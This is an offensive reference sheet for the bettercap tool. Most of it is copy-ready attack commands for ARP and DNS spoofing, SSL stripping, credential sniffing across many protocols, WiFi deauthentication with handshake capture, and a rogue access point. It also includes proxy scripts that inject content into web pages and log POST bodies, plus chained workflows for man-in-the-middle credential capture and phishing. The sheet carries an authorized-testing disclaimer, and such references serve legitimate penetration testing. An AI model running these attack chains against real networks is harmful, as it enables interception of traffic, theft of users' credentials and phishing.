BETTERCAP
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Swiss army knife for network attacks, MITM, WiFi, BLE, and HID reconnaissance and exploitation.
INSTALLATION#
sudo apt install bettercap # Kali/Debian brew install bettercap # macOS go install github.com/bettercap/bettercap@latest # Go # Start sudo bettercap sudo bettercap -iface eth0 # Specific interface sudo bettercap -caplet script.cap # Run caplet
NETWORK DISCOVERY#
net.probe on # Active host discovery net.show # Show discovered hosts net.recon on # Passive recon net.clear # Clear host list # Target specific hosts set arp.spoof.targets 10.10.10.5 set arp.spoof.targets 10.10.10.5,10.10.10.6
ARP SPOOFING (MITM)#
# Full duplex (both directions) set arp.spoof.fullduplex true set arp.spoof.targets 10.10.10.5 # Victim IP arp.spoof on # Spoof entire subnet set arp.spoof.targets 10.10.10.0/24 set arp.spoof.fullduplex true arp.spoof on # Spoof with internal forwarding set arp.spoof.internal true # Intercept LAN-to-LAN arp.spoof on
DNS SPOOFING#
set dns.spoof.domains example.com set dns.spoof.address 10.10.10.100 # Redirect to this IP set dns.spoof.all true # Spoof all domains dns.spoof on # Multiple domains set dns.spoof.domains example.com,login.example.com,*.target.com
HTTP/HTTPS PROXY#
# HTTP proxy (intercept cleartext) set http.proxy.sslstrip true # SSL strip http.proxy on # HTTPS proxy (requires CA cert) set https.proxy.sslstrip true https.proxy on # Custom proxy script (JavaScript) set http.proxy.script /path/to/script.js http.proxy on # SSL strip set net.sniff.verbose true set arp.spoof.targets 10.10.10.5 arp.spoof on http.proxy on net.sniff on
SNIFFING#
net.sniff on # Start sniffer set net.sniff.verbose true # Verbose output set net.sniff.output capture.pcap # Save to file set net.sniff.filter "tcp port 80" # BPF filter set net.sniff.regexp "password|login|user" # Regex filter net.sniff off # Stop
CREDENTIAL SNIFFING#
# Automatic credential extraction set net.sniff.verbose true net.sniff on # Captures credentials from: # HTTP Basic Auth, HTTP POST forms # FTP, SMTP, POP3, IMAP # Telnet, SNMP # NTLMv1/v2 hashes
WIFI ATTACKS#
# Set interface to monitor mode first sudo bettercap -iface wlan0mon # WiFi recon wifi.recon on # Scan for APs wifi.show # Show discovered APs wifi.recon.channel 1,6,11 # Specific channels # Deauthentication wifi.deauth AP_BSSID # Deauth all clients wifi.deauth CLIENT_MAC # Deauth specific client # WPA handshake capture set wifi.handshakes.file handshakes/ wifi.recon on wifi.deauth AP_BSSID # Force reconnection # Handshake saved to file โ crack with aircrack/hashcat # Evil twin wifi.ap on # Start rogue AP
BLE (BLUETOOTH LOW ENERGY)#
ble.recon on # Scan BLE devices ble.show # Show discovered devices ble.enum DEVICE_MAC # Enumerate services ble.write DEVICE_MAC UUID DATA # Write to characteristic
CAPLETS (SCRIPTS)#
# Caplets are automation scripts (.cap files) # Run caplet sudo bettercap -caplet http-ui # Web UI sudo bettercap -caplet https-ui # HTTPS Web UI sudo bettercap -caplet pita # ARP spoof + sniff # Custom caplet example (mitm.cap): set arp.spoof.fullduplex true set arp.spoof.targets 10.10.10.5 set net.sniff.verbose true set net.sniff.output /tmp/capture.pcap net.probe on arp.spoof on net.sniff on http.proxy on # Run: sudo bettercap -caplet mitm.cap
WEB UI#
# Start with web interface sudo bettercap -caplet https-ui # Or manually set api.rest.address 0.0.0.0 set api.rest.port 8083 set api.rest.username admin set api.rest.password password api.rest on # Access: https://127.0.0.1:8083
PROXY SCRIPTS (JAVASCRIPT)#
// Inject content into HTTP responses
function onResponse(req, res) {
if (res.ContentType.indexOf('text/html') == 0) {
var body = res.ReadBody();
res.Body = body.replace('</head>',
'<script>alert("injected")</script></head>');
}
}
// Log POST data
function onRequest(req, res) {
if (req.Method == "POST") {
log("POST " + req.Hostname + req.Path +
" | Body: " + req.ReadBody());
}
}
COMMON ATTACK WORKFLOWS#
# 1. MITM + credential capture net.probe on set arp.spoof.fullduplex true set arp.spoof.targets 10.10.10.0/24 arp.spoof on net.sniff on # 2. DNS spoofing + phishing set arp.spoof.targets 10.10.10.5 arp.spoof on set dns.spoof.domains login.company.com set dns.spoof.address 10.10.10.100 dns.spoof on # 3. SSL stripping set arp.spoof.targets 10.10.10.5 arp.spoof on set http.proxy.sslstrip true http.proxy on net.sniff on # 4. WiFi handshake capture wifi.recon on # Wait for target AP wifi.deauth TARGET_BSSID # Check handshakes/ directory
TIPS#
- Use fullduplex for reliable MITM - Caplets automate complex attack chains - Web UI provides visual network map - WiFi attacks require monitor mode interface - net.probe actively discovers all hosts on subnet - Proxy scripts enable real-time traffic manipulation - BLE recon useful for IoT pentesting - HSTS prevents SSL stripping on modern sites - Save captures for offline analysis in Wireshark - Run net.probe before arp.spoof for target discovery